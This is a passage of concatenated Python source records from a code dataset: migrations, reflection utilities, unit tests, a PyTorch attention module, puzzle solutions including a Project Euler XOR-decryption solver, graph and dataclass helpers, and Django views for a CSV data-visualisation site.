commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('category', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('pitches', 'category')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/312c8ab46c53_second_migration.py","file_name":"312c8ab46c53_second_migration.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"283184812","text":"# encoding: utf-8\n\n\"\"\"\nMIT License\n\nCopyright (c) 2019 BKraujo\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n# Standard Library\nimport logging\nimport inspect\nimport importlib\nfrom inspect import FullArgSpec\nfrom types import FunctionType\nfrom typing import Any\nfrom typing import List\nfrom typing import NoReturn\n\n# 3rd Party Library\n# Current Folder\n# Current Application\n\n# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_class(klass) -> Any:\n module_name, class_name = klass.rsplit(\".\", 1)\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\ndef get_instance(klass, *parameters) -> Any:\n return get_class(klass)(*parameters)\n\n\ndef get_attr(module, name) -> Any:\n module = importlib.import_module(module)\n return getattr(module, name)\n\n\ndef list_parameters(method) -> List:\n output = list()\n\n if callable(method):\n spec: FullArgSpec = inspect.getfullargspec(method)\n\n if spec.args:\n for index in range(0, len(spec.args)):\n arg: str = spec.args[index]\n if arg == 'self' or arg == 'cls':\n continue\n\n output.append((arg, spec.annotations[arg]))\n\n return output\n\n\ndef list_methods(source, interface=None) -> List[FunctionType]:\n output: List[FunctionType] = list()\n\n members = __list_public_functions(source)\n if interface:\n\n interface_members = __list_public_functions(interface)\n for im in interface_members:\n for sm in members:\n if sm.__name__ == im.__name__:\n output.append(sm)\n\n else:\n output += members\n\n return output\n\n\ndef __list_public_functions(source) -> List[FunctionType]:\n output: List[FunctionType] = list()\n\n members: List = inspect.getmembers(source)\n for member in members:\n if not 
member[0].startswith('__') and isinstance(member[1], FunctionType):\n output.append(member[1])\n\n return output\n","sub_path":"src/main/pinnacle/ext/python/generics.py","file_name":"generics.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"91398511","text":"from unittest.mock import MagicMock\nfrom ...generators.file import FileGenerator\nfrom nio.common.block.base import Block\nfrom nio.util.support.block_test_case import NIOBlockTestCase\n\n\nclass SampleFileBlock(FileGenerator, Block):\n pass\n\n\nclass TestFile(NIOBlockTestCase):\n\n def test_random_signals(self):\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[{'a': 'A'}, {'b': 'B'}])\n self.configure_block(blk, {\n \"random_selection\": True\n })\n\n def _test_generate_signals(blk):\n results = list(blk.generate_signals())\n self.assertEqual(len(results), 1)\n try:\n # Check if the signal is the 'A' signal\n self.assertEqual(results[0].a, 'A')\n except:\n # If it's not 'A', then it better be 'B'\n self.assertEqual(results[0].b, 'B')\n\n # test a handful of gerations to check the randomness\n for _ in range(9):\n _test_generate_signals(blk)\n\n def test_sequential_signals(self):\n \"\"\" Make sure we iterate through the list and roll over \"\"\"\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[\n {'a': 'A'}, {'b': 'B'}, {'c': 'C'}])\n self.configure_block(blk, {\n \"random_selection\": False\n })\n\n four_signals = blk.generate_signals(n=4)\n self.assertEqual(len(four_signals), 4)\n self.assertEqual(four_signals[0].a, 'A')\n self.assertEqual(four_signals[1].b, 'B')\n self.assertEqual(four_signals[2].c, 'C')\n self.assertEqual(four_signals[3].a, 'A')\n\n def test_sequential_multiple_signals(self):\n \"\"\" Make sure we iterate through the list and roll over \"\"\"\n blk = SampleFileBlock()\n blk._load_json_file = MagicMock(return_value=[\n {'a': 'A'}, {'b': 
'B'}, {'c': 'C'}])\n self.configure_block(blk, {\n \"random_selection\": False\n })\n\n two_signals = blk.generate_signals(n=2)\n three_signals = blk.generate_signals(n=3)\n self.assertEqual(len(two_signals), 2)\n self.assertEqual(len(three_signals), 3)\n self.assertEqual(two_signals[0].a, 'A')\n self.assertEqual(two_signals[1].b, 'B')\n self.assertEqual(three_signals[0].c, 'C')\n self.assertEqual(three_signals[1].a, 'A')\n self.assertEqual(three_signals[2].b, 'B')\n\n def test_load_json_file_bad(self):\n blk = SampleFileBlock()\n with self.assertRaises(Exception):\n self.configure_block(blk, {})\n json_sigs = blk._load_json_file()\n self.assertIsNone(json_sigs)\n\n def test_load_json_file(self):\n blk = SampleFileBlock()\n self.configure_block(blk, {\n 'signals_file': '../tests/generators/signals.json'\n })\n json_sigs = blk._load_json_file()\n self.assertEqual(len(json_sigs), 5)\n","sub_path":"tests/generators/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632041766","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# 以下实现仅为 single-batch版本\n# l 代表 local m 代表 conv\nclass Compressed_Attention(nn.Module):\n def __init__(self,name='l',head=4,k_dim=64,d_model=256,p_drop=0.1,compression_rate=4,block_size=64):\n super().__init__()\n self.name = name\n self.head = head\n self.d_model = d_model\n self.k_dim = k_dim\n self.block_size = block_size\n self.multi_head_query = nn.Linear(d_model,d_model)\n self.multi_head_key = nn.Linear(d_model,d_model)\n self.multi_head_value = nn.Linear(d_model,d_model)\n self.output_matrix = nn.Linear(d_model,d_model)\n self.dropout = nn.Dropout(p_drop)\n if name == 'M':\n self.conv = nn.Conv1d(in_channels=d_model,out_channels=d_model,\n kernel_size=compression_rate,stride=compression_rate,groups=head)\n \n def forward(self,src,input_mask=None,use_gpu=True):\n # src 
(batch_size,seq_len,d_model)\n # 首先判断当前模型是什么\n batch_size = src.size()[0]\n seq_len = src.size()[1]\n if self.name == 'L':\n if input_mask is not None:\n input_mask = input_mask.reshape((batch_size, -1, self.block_size))\n query = self.multi_head_query(src).view(batch_size, seq_len, self.head, -1)\n key = self.multi_head_key(src).view(batch_size, seq_len, self.head, -1)\n value = self.multi_head_value(src).view(batch_size, seq_len, self.head, -1)\n chunk_query = query.reshape(batch_size, -1, self.block_size, self.head, query.size()[-1])\n chunk_key = key.reshape(batch_size,-1,self.block_size,self.head,key.size()[-1])\n chunk_value = value.reshape(batch_size,-1,self.block_size,self.head,value.size()[-1])\n chunk_query = chunk_query.permute(0,3,1,2,4)\n chunk_key = chunk_key.permute(0,3,1,4,2)\n chunk_value = chunk_value.permute(0,3,1,2,4)\n #(batch,head,num,block_size,block_size)\n chunk_qk = chunk_query.matmul(chunk_key)* (self.k_dim ** -0.5)\n if input_mask is not None:\n chunk_qk = chunk_qk.masked_fill(input_mask[:,None,:,None,:],value=-1e10)\n chunk_qk = F.softmax(chunk_qk,dim=-1)\n chunk_qkv = torch.matmul(chunk_qk,chunk_value)\n #(batch,head,seq_len,k_dim)\n qkv = chunk_qkv.contiguous().view(batch_size,self.head,-1,chunk_qkv.size()[-1])\n if self.name =='M':\n multi_query = self.multi_head_query(src)\n multi_key = self.multi_head_key(src)\n multi_value = self.multi_head_value(src)\n # 因为这里含有pad,我们首先缩短 key value 的长度\n if input_mask is not None:\n pad_len = torch.sum(input_mask,dim=-1).item()\n multi_key = multi_key[:,:-pad_len,:]\n multi_value = multi_value[:,:-pad_len,:]\n multi_key = multi_key.transpose(1,2)\n multi_value = multi_value.transpose(1,2)\n #(batch,short_len,d_model)\n after_cnn_multi_key = self.conv(multi_key).transpose(1,2)\n after_cnn_multi_value = self.conv(multi_value).transpose(1,2)\n multi_query = multi_query.view(batch_size,-1,self.head,self.k_dim).permute(0,2,1,3)\n after_cnn_multi_key = 
after_cnn_multi_key.contiguous().view(batch_size,-1,self.head,self.k_dim).permute(0,2,3,1)\n after_cnn_multi_value = after_cnn_multi_value.contiguous().view(batch_size,-1,self.head,self.k_dim).permute(0,2,1,3)\n global_qk = torch.matmul(multi_query, after_cnn_multi_key)\n global_qk = F.softmax(global_qk,dim=-1)\n #(batch,head,seq_len,k_dim)\n qkv = torch.matmul(global_qk, after_cnn_multi_value)\n # 然后紧接着,\n qkv = qkv.permute(0,2,1,3).contiguous().view(batch_size,seq_len,-1)\n qkv = self.output_matrix(qkv)\n qkv = self.dropout(qkv)\n return qkv\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"model/compressed_attention.py","file_name":"compressed_attention.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33016183","text":"from decimal import *\nfrom math import sin , pi , sqrt\n\ndef getRadian( x ):\n return x*Decimal(pi)/180\n\ndef area( a , b , c ):\n\n p = (a+b+c)/2\n return Decimal( sqrt( p*(p-a)*(p-b)*(p-c) ) )\n\nif __name__ == \"__main__\":\n\n getcontext().prec = 100\n n , r = map( Decimal , input().split() )\n\n beta = 90/n\n beta_radian = getRadian( beta )\n #print( beta_radian )\n\n gamma = 180/n\n gamma_radian = getRadian( gamma )\n #print( gamma_radian )\n\n S = r*r*Decimal(sin(beta_radian))*Decimal(sin(gamma_radian))/Decimal(sin(beta_radian+gamma_radian))\n print(n*S)","sub_path":"160218-volBIT-edu/630P.py","file_name":"630P.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361765703","text":"# euler 59\n\nimport time\n\ndef get_text():\n\n file = 'euler059.txt'\n text = open(file).read()\n s = text.strip(\"\\n''\")\n s_int = list(map(int,s.split(\",\")))\n\n return s_int\n\ndef find_key(pile):\n\n freq = [' ','e' ,'t' ,'a', 'o', 'i', 'n','s', 'r', 'h' ,'l' ,'d' ,'c', 'u', 'm', 'f']\n freq_ord = [ord(ch) for ch in freq]\n pile_d = {x:pile.count(x) for x in pile}\n 
pile_s = sorted(pile_d, key=lambda x: pile_d[x])[::-1]\n\n key_pile = []\n\n for k in range(97,123):\n for i,o in zip(freq_ord,pile_s):\n if(i^k == o):\n key_pile.append(chr(k))\n\n return max(key_pile,key=key_pile.count)\n\ndef split_text(text):\n\n pile1 = []\n pile2 = []\n pile3 = []\n\n for i in range(0,len(text)-1,3):\n\n pile1.append(text[i])\n pile2.append(text[i+1])\n pile3.append(text[i+2])\n\n return find_key(pile1) + find_key(pile2) + find_key(pile3)\n\n\ndef xor_op(key,text):\n\n s_int = get_text()\n y = ''\n s = 0\n\n for i in range(0,len(s_int)-1,3):\n\n y += (chr(s_int[i]^ ord(key[0])))\n s += (s_int[i]^ ord(key[0]))\n y += (chr(s_int[i+1]^ord(key[1])))\n s += (s_int[i+1]^ ord(key[1]))\n y += (chr(s_int[i+2]^ord(key[2])))\n s += (s_int[i+2]^ ord(key[2]))\n\n\n # one character still left !\n s += (s_int[i+3]^ ord(key[0]))\n\n return (y,s)\n\ndef main():\n\n t = time.time()\n text = get_text()\n key = split_text(text)\n print(\"KEY: \", key)\n y,s = xor_op(key,text)\n print(\"\\nTEXT: \\n\\n\",y )\n print(\"\\nSUM: \", s)\n\n print(\"Time taken: \" , time.time()-t, \"s\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"euler059.py","file_name":"euler059.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423289795","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport logging\n\nfrom graphit import __module__\n\nlogger = logging.getLogger(__module__)\n\n\ndef graph_undirectional_to_directional(graph):\n \"\"\"\n Convert a undirectional to a directional graph\n\n Returns a deep copy of the full graph with all undirectional edges\n duplicated as directional ones.\n\n In an undirectional edge the edge pair shares a single attribute\n dictionary. 
This dictionary gets duplicated to the unique directional\n edges.\n\n :param graph: Graph to convert\n :type graph: :graphit:Graph\n\n :return: Directional graph\n :rtype: :graphit:Graph\n \"\"\"\n\n if graph.directed:\n logging.info('Graph already configured as directed graph')\n\n graph_copy = graph.copy(deep=True)\n graph_copy.directed = True\n\n # remove all $data_ref pointers between undirectional edge pairs\n for edge in graph_copy.edges:\n if graph_copy.edges.has_data_reference(edge):\n graph_copy.edges.del_data_reference(edge)\n\n # Update reverse edge with data from forwards edge\n reverse_edge = tuple(reversed(edge))\n if reverse_edge in graph_copy.edges:\n graph_copy.edges[reverse_edge].update(graph_copy.edges[edge])\n\n return graph_copy\n\n\ndef graph_directional_to_undirectional(graph):\n \"\"\"\n Convert a directional to an undirectional graph\n\n Returns a deep copy of the full graph with all directional edges\n duplicated as undirectional ones.\n Undirectional edges share the same data dictionary. In converting\n directional to undirectional edges their data dictionaries will\n be merged.\n\n .. 
Note:: dictionary merging may result in undesirable results due\n to data overwrite.\n\n :param graph: Graph to convert\n :type graph: :graphit:Graph\n\n :return: Directional graph\n :rtype: :graphit:Graph\n \"\"\"\n\n if not graph.directed:\n logging.info('Graph already configured as undirected graph')\n\n graph_copy = graph.copy(deep=True)\n graph_copy.directed = False\n graph_copy.edges.clear()\n\n done = []\n for edge in graph.edges:\n reverse_edge = tuple(reversed(edge))\n values = copy.deepcopy(graph.edges[edge])\n\n if edge in done or reverse_edge in done:\n continue\n\n if reverse_edge in graph.edges:\n values.update(graph.edges[reverse_edge])\n done.append(reverse_edge)\n\n graph_copy.add_edge(*edge, **values)\n done.append(edge)\n\n return graph_copy\n\n\ndef edges_parent_to_subgraph(subgraph, parent=None):\n \"\"\"\n Return edges connecting a subgraph with the parent graph\n\n 'subgraph.origin' is used as parent graph by default to derive connections.\n This will no longer work in case a copy is made of the subgraph as it will\n reset the link to the parent.\n The `parent` argument can be used to specify a dedicated parent graph in\n these and all other cases where connected edges between two separate graphs\n that share the same node ID's needs to be determined.\n\n :param subgraph: subgraph\n :type subgraph: :graphit:Graph\n :param parent: dedicated parent graph to derive connections to/from\n :type parent: :graphit:Graph\n\n :return: edges connecting graphs\n :rtype: :py:list\n \"\"\"\n\n if parent is None:\n parent = subgraph\n\n connected = []\n for nid in subgraph.nodes():\n node = parent.getnodes(nid)\n connected.extend(node.connected_edges())\n\n return list(set(connected).difference(subgraph.edges))\n","sub_path":"graphit/graph_utils/graph_utilities.py","file_name":"graph_utilities.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"630677829","text":"from __future__ import annotations\n\nfrom dataclasses import MISSING, fields\nfrom datetime import datetime\nfrom enum import Enum\nfrom textwrap import indent\nfrom typing import TYPE_CHECKING, Any, Callable, Optional, Sequence, Type, Union\n\nfrom pydantic import validator\nfrom pydantic.dataclasses import _process_class\n\nif TYPE_CHECKING:\n from pydantic.dataclasses import DataclassType\n\n\nclass Sentinel:\n \"\"\"Create singleton sentinel objects with a readable repr.\"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n\n def __repr__(self) -> str:\n return f\"{__name__}.{self.name}\"\n\n\n# Default value to support optional fields in dataclass subclasses.\nEMPTY = Sentinel(\"EMPTY\")\n# Default value to support automatic numbering for id field values.\nAUTO_SEQUENCE = Sentinel(\"AUTO_SEQUENCE\")\n\n\n@validator(\"id\", pre=True, always=True)\ndef validate_id(cls: Type[Any], value: Any) -> str:\n \"\"\"Pydantic validator for ID fields in OME dataclasses.\n\n If no value is provided, this validator provides and integer ID, and stores the\n maximum previously-seen value on the class.\n \"\"\"\n from typing import ClassVar\n\n # get the required LSID type from the annotation\n id_type = cls.__annotations__.get(\"id\")\n if not id_type:\n return value\n\n # Store the highest seen value on the class._max_id attribute.\n if not hasattr(cls, \"_max_id\"):\n cls._max_id = 0\n cls.__annotations__[\"_max_id\"] = ClassVar[int]\n\n if value is AUTO_SEQUENCE:\n value = cls._max_id + 1\n if isinstance(value, int):\n v_id = value\n id_string = id_type.__name__[:-2]\n value = f\"{id_string}:{value}\"\n else:\n value = str(value)\n v_id = value.rsplit(\":\", 1)[-1]\n try:\n v_id = int(v_id)\n cls._max_id = max(cls._max_id, v_id)\n except ValueError:\n pass\n\n return id_type(value)\n\n\ndef modify_post_init(_cls: Type[Any]) -> None:\n \"\"\"Modify __post_init__.\n\n Provides support for non-default arguments in dataclass 
subclasses (where the super\n class has default args) by providing the default value \"EMPTY\" from this module.\n \"\"\"\n origin_post_init = getattr(_cls, \"__post_init__\", None)\n required_fields = {k for k, v in _cls.__dict__.items() if v is EMPTY}\n\n def new_post_init(self: Any, *args: Any) -> None:\n missed = {f for f in required_fields if getattr(self, f, None) is EMPTY}\n if missed:\n nmissed = len(missed)\n s = \"s\" if nmissed > 1 else \"\"\n raise TypeError(\n f\"__init__ missing {nmissed} required argument{s}: {sorted(missed)!r}\"\n )\n if origin_post_init is not None:\n origin_post_init(self, *args)\n\n setattr(_cls, \"__post_init__\", new_post_init)\n\n\ndef modify_repr(_cls: Type[Any]) -> None:\n \"\"\"Improved dataclass repr function.\n\n Only show non-default non-internal values, and summarize containers.\n \"\"\"\n # let classes still create their own\n if _cls.__repr__ is not object.__repr__:\n return\n\n def new_repr(self: Any) -> str:\n name = self.__class__.__qualname__\n lines = []\n for f in sorted(fields(self), key=lambda f: f.name not in (\"name\", \"id\")):\n if f.name.endswith(\"_\"):\n continue\n # https://github.com/python/mypy/issues/6910\n if f.default_factory is not MISSING: # type: ignore\n default = f.default_factory() # type: ignore\n else:\n default = f.default\n\n current = getattr(self, f.name)\n if current != default:\n if isinstance(current, Sequence) and not isinstance(current, str):\n rep = f\"[<{len(current)} {f.name.title()}>]\"\n elif isinstance(current, Enum):\n rep = repr(current.value)\n elif isinstance(current, datetime):\n rep = f\"datetime.fromisoformat({current.isoformat()!r})\"\n else:\n rep = repr(current)\n lines.append(f\"{f.name}={rep},\")\n if len(lines) == 1:\n body = lines[-1].rstrip(\",\")\n elif lines:\n body = \"\\n\" + indent(\"\\n\".join(lines), \" \") + \"\\n\"\n else:\n body = \"\"\n out = f\"{name}({body})\"\n return out\n\n setattr(_cls, \"__repr__\", new_repr)\n\n\ndef ome_dataclass(\n _cls: 
Optional[Type[Any]] = None,\n *,\n init: bool = True,\n repr: bool = False,\n eq: bool = True,\n order: bool = False,\n unsafe_hash: bool = False,\n frozen: bool = False,\n config: Type[Any] = None,\n) -> Union[Callable[[Type[Any]], DataclassType], DataclassType]:\n \"\"\"Wrapper on the pydantic dataclass decorator.\n\n Provides OME-specific methods and validators.\n \"\"\"\n\n def wrap(cls: Type[Any]) -> DataclassType:\n if getattr(cls, \"id\", None) is AUTO_SEQUENCE:\n setattr(cls, \"validate_id\", validate_id)\n modify_post_init(cls)\n if not repr:\n modify_repr(cls)\n return _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, config)\n\n return wrap if _cls is None else wrap(_cls)\n\n\n__all__ = [\"EMPTY\", \"ome_dataclass\"]\n","sub_path":"src/ome_types/dataclasses.py","file_name":"dataclasses.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69575218","text":"import os\nimport csv\nimport glob\nimport logging\n\nfrom django.http import HttpResponseRedirect, JsonResponse, HttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom vision import utils, forms\n\nlog_main = logging.getLogger('main')\n\n\n# INDEX\ndef index(request):\n \"\"\"首页\"\"\"\n response = TemplateResponse(request, 'vision/index.html', {})\n\n return response\n\n\n# COMPARISON\ndef comparison(request):\n \"\"\"数据可视化目的: 比较数据.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No 
file.')\n return HttpResponseRedirect(reverse('comparison'))\n\n is_active = utils.is_active(request)\n\n global settings\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('comparison'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_comparison()\n\n response = TemplateResponse(request, 'vision/comparison.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# CAUSAL\ndef causal(request):\n \"\"\"数据可视化目的: 探究因果关系.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No file.')\n return HttpResponseRedirect(reverse('causal'))\n\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('causal'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_causal()\n\n response = 
TemplateResponse(request, 'vision/causal.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# ALL CHARTS\ndef allcharts(request):\n \"\"\"数据可视化目的: 使用所有可视化组件.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No file.')\n return HttpResponseRedirect(reverse('allcharts'))\n\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('allcharts'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_all()\n\n response = TemplateResponse(request, 'vision/allcharts.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# HISTORY DATA\n@login_required\ndef historydata(request):\n \"\"\"注册用户的历史数据\"\"\"\n global settings\n\n username = request.user.username\n\n charts = utils.get_charts_all()\n form = forms.HistoryFileForm(username=username)\n\n response = TemplateResponse(request, 'vision/historydata.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# API\n@csrf_exempt\ndef api_data_file(request, dtype=None, name=None):\n \"\"\"获取 csv 文件.\n\n Note:\n + 一次获取完后即删除文件.\n\n Input:\n + dtype: str, 取值范围 ['normal', 'cluster', 'pie', 'line']\n + name: str, 文件名称\n\n Output:\n + json 格式数据,\n - dtype 为 'normal' 时,内容为:\n [\n {\n 条目名称: xxx,\n 条目名称: xxx,\n ...,\n 条目名称: xxx,\n },\n {\n 条目名称: xxx,\n 条目名称: xxx,\n 
...,\n 条目名称: xxx,\n },\n ...,\n {\n 条目名称: xxx,\n 条目名称: xxx,\n ...,\n 条目名称: xxx,\n },\n ]\n - dtype 为 'cluster' 时,内容为:\n {\n 条目名称: [xxx, xxx, ..., xxx],\n 条目名称: [xxx, xxx, ..., xxx],\n ...,\n 条目名称: [xxx, xxx, ..., xxx],\n },\n \"\"\"\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n if not name.endswith('.csv'):\n name = '{0}.csv'.format(name)\n\n fname = os.path.join(dir_data, name)\n\n ret = {\n 'status': 'success',\n 'errmsg': '',\n 'data': '',\n }\n if not os.path.isfile(fname):\n errmsg = '\"{0}\" is not a regular file.'.format(fname)\n log_main.warning(errmsg)\n\n ret['status'] = 'fail'\n ret['errmsg'] = errmsg\n else:\n with open(fname, 'r') as fp:\n dialect = csv.Sniffer().sniff(fp.readline())\n fp.seek(0)\n csvreader = csv.DictReader(fp, delimiter=dialect.delimiter)\n fieldnames = csvreader.fieldnames\n\n if dtype == 'normal':\n ret['data'] = []\n for row in csvreader:\n tmp = {}\n for field in fieldnames:\n tmp[field] = row[field].strip()\n\n ret['data'].append(tmp)\n elif dtype == 'line':\n ret['data'] = []\n tmp_arr = {}\n for field in fieldnames:\n tmp_arr[field] = []\n\n for row in csvreader:\n for field in fieldnames:\n tmp = float(row[field].strip())\n tmp_arr[field].append(tmp)\n\n for name, data in tmp_arr.items():\n ret['data'].append({'name': name, 'data': data})\n elif dtype == 'pie':\n ret['data'] = []\n for row in csvreader:\n values = []\n for field in fieldnames:\n value = row[field].strip()\n values.append(value)\n values[1] = float(values[1])\n ret['data'].append(values)\n\n if not is_active:\n # 删除临时用户的文件\n os.remove(fname)\n\n response = JsonResponse(ret)\n\n return response\n\n\n# REGISTER\ndef register(request):\n \"\"\"注册用户\"\"\"\n if request.method == 'POST':\n form = forms.UserForm(request.POST)\n\n if form.is_valid():\n 
cleaned_data = form.cleaned_data\n\n auth_user = auth.models.User.objects.create_user(**cleaned_data)\n auth_user.save()\n\n return HttpResponseRedirect(reverse('index'))\n else:\n log_main.info('form is invalid.')\n\n return HttpResponseRedirect(reverse('register'))\n\n form = forms.UserForm()\n\n response = TemplateResponse(request, 'vision/register.html', {\n 'form': form,\n })\n\n return response\n\n\n# LOGIN\ndef login(request):\n \"\"\"login\"\"\"\n if request.method == 'POST':\n form = forms.UserForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n user = authenticate(**cleaned_data)\n\n if user is not None:\n if user.is_active:\n auth_login(request, user)\n\n return HttpResponseRedirect(reverse('index'))\n else:\n error = '账户未激活'\n else:\n error = '用户名或密码错误'\n\n form = forms.UserForm()\n form.errors['error'] = error\n\n return HttpResponseRedirect(reverse('login'))\n\n form = forms.UserForm()\n\n response = TemplateResponse(request, 'vision/login.html', {'form': form})\n\n return response\n\n\n# LOGOUT\n@login_required\ndef logout(request):\n \"\"\"logout\"\"\"\n auth_logout(request)\n\n return HttpResponseRedirect(reverse('index'))\n\n\n# CHANGE PASSWORD\n@login_required\ndef modpasswd(request):\n \"\"\"修改密码\"\"\"\n if request.method == 'POST':\n form = forms.ModPasswdForm(request.POST)\n\n if form.is_valid():\n user = request.user\n cleaned_data = form.cleaned_data\n\n old_passwd = cleaned_data['old_passwd']\n new_passwd = cleaned_data['new_passwd']\n\n checked = user.check_password(old_passwd)\n\n if checked:\n user.set_password(new_passwd)\n user.save()\n return HttpResponseRedirect(reverse('index'))\n else:\n log_main.info('invalid')\n\n return HttpResponseRedirect(reverse('modpasswd'))\n\n form = forms.ModPasswdForm()\n\n response = TemplateResponse(request, 'vision/modpasswd.html', {\n 'form': form,\n })\n\n return response\n\n\n\n# TEST\ndef thanks(request):\n return 
